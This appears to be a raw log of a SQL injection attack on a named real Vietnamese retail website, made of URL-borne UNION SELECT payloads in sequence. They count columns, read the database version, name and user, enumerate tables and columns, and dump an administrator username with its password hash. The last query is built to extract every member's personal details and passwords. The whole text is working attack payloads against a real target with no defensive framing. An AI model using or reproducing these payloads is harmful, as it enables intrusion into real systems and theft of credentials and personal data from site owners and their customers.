huonglieuminhkien.com/?

php=product_detail&id=244 order by 14
huonglieuminhkien.com/?php=product_detail&id=null UNION SELECT 1,2,3,4,5,6,7,8,
9,10,11,12,13,14
huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,version
(),7,8,9,10,11,12,13,14-huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,databas
e(),7,8,9,10,11,12,13,14-minhkien_binh
//huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,user(
),7,8,9,10,11,12,13,14-minhkien_binh@localhost
huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,unhex(h
ex(group_concat(table_name))),7,8,9,10,11,12,13,14 from information_schema.table
s where table_schema=database()-- tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_product,tbl_product_c
ategory,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,unhex(h
ex(group_concat(column_name))),7,8,9,10,11,12,13,14 from information_schema.colu
mns where table_name= CHAR(116, 98, 108, 95, 117, 115, 101, 114) -huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,unhex(h
ex(group_concat(id,0x3a,uid,0x3a,pwd))),7,8,9,10,11,12,13,14 from tbl_user -1:admincp:6edf92c7bee3c535a17d78abb5f4632e
// table : tbl_member
huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,unhex(h
ex(group_concat(column_name))),7,8,9,10,11,12,13,14 from information_schema.colu
mns where table_name=CHAR(116, 98, 108, 95, 109, 101, 109, 98, 101, 114)
huonglieuminhkien.com/?php=product_detail&id=-224 UNION SELECT 1,2,3,4,5,unhex(h
ex(group_concat(id,0x3a,name,0x3a,sex,0x3a,company,0x3a,address,0x3a,city,0x3a,c
ountry,0x3a,tel,0x3a,fax,0x3a,email,0x3a,website,0x3a,uid,0x3a,pwd,0x3a,status,0
x3a,date_added,0x3a,last_modified,0x3a,note,0x3a,code,0x3a,orderid))),7,8,9,10,1
1,12,13,14 from tbl_member --